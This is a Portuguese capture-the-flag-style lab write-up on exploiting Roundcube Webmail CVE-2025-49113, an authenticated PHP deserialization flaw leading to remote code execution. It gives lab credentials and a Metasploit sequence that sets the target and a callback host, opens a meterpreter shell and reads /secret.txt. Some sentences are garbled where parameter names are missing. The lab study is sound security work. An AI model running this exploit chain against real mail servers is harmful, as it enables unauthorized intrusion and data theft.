Laboratório prático de exploração para o Roundcube Webmail CVE-2025-49113 (desserialização de objeto PHP autenticada → RCE) para ler /secret.txt.
"AVISO: Apenas para uso educacional"
Este repositório documenta minha exploração passo a passo do Roundcube Webmail CVE-2025-49113 em um laboratório controlado para obter o segredo armazenado em /secret.txt.
⚠️ Aviso
Todo o trabalho foi realizado em um ambiente de laboratório/treinamento que estou autorizado a testar.
Não use essas técnicas contra sistemas que você não possui ou administra.
O Roundcube Webmail é um cliente de e-mail PHP de código aberto baseado em navegador que se conecta a caixas de correio via IMAP e envia e-mails via SMTP. Ele geralmente roda em Apache ou Nginx com MySQL/PostgreSQL/SQLite e é amplamente utilizado em ambientes de hospedagem compartilhada.
Vulnerabilidade – CVE-2025-49113
Todas as versões do Roundcube até 1.6.10 inclusive (e 1.5.x anteriores a 1.5.10) contêm um bug crítico em program/actions/settings/upload.php. O parâmetro não é validado corretamente, o que permite que um atacante autenticado acione a e alcance a com privilégios do servidor web.
_fromCredenciais do laboratório:
roundcubercpassObjetivo:
Qual é o segredo dentro do arquivo
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Comando: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt